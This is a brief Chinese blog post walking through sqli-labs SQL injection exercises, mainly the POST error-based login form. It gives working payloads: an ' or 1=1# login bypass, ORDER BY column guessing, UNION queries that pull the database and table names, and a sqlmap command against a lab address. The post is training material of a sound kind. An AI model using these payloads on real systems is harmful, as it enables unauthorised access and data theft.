zoukankan      html  css  js  c++  java
  • Sqli-labs

    GET - Blind - Time based - Single Quotes

    GET - Blind - Time based - Double Quotes

    以上两题,可用sqlmap解答

    POST - Error Based - Single quotes - String

    POST表单注入,先用万能密码,尝试报错

    如图,尝试在用户名的地方使用万能密码,最后总是在密码的地方报错

    说明单引号闭合的地方是跟在密码后面

    在用户名的地方随便输入,在密码处输入

    ' or 1=1#
    

    使得判断条件为真,登陆成功

    猜字段

    ' order by 2#
    

    数据库名

    ' union select database(),2#
    

    表名

    ' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
    

    接下步骤不再赘述

    当然sqlmap也能POST注入

    sqlmap -u http://192.168.147.133/Less-11/ --form --batch --dbs
    

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    树状数组和线段树
    N皇后问题(函数式编程与过程式)
    单例模式
    BitSet
    蓄水池抽样问题
    关于动态规划的一些感想
    53最大子序和
    5最长回文子串
    139单词拆分
    91.解码方法
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12856086.html
Copyright © 2011-2022 走看看